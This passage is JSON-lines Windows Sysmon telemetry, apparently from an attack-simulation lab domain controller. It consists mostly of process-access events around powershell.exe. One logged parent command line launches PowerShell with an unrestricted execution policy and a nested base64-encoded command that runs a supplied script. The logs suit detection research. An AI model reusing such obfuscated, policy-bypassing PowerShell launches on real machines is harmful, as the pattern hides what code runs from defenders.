BmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-22D1-5F25-0000-00205EAC1100}","LogonId":"0x11ac5e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-22D1-5F25-0000-001012B01100}","ParentProcessId":"5064","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-001012B01100}\r\nSourceProcessId: 5064\r\nSourceThreadId: 2232\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-22B6-5F25-0000-00101FC91000}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-001012B01100}","SourceProcessId":"5064","SourceThreadId":"2232","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-22B6-5F25-0000-00101FC91000}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B6-5F25-0000-00101FC91000}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B6-5F25-0000-00101FC91000}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+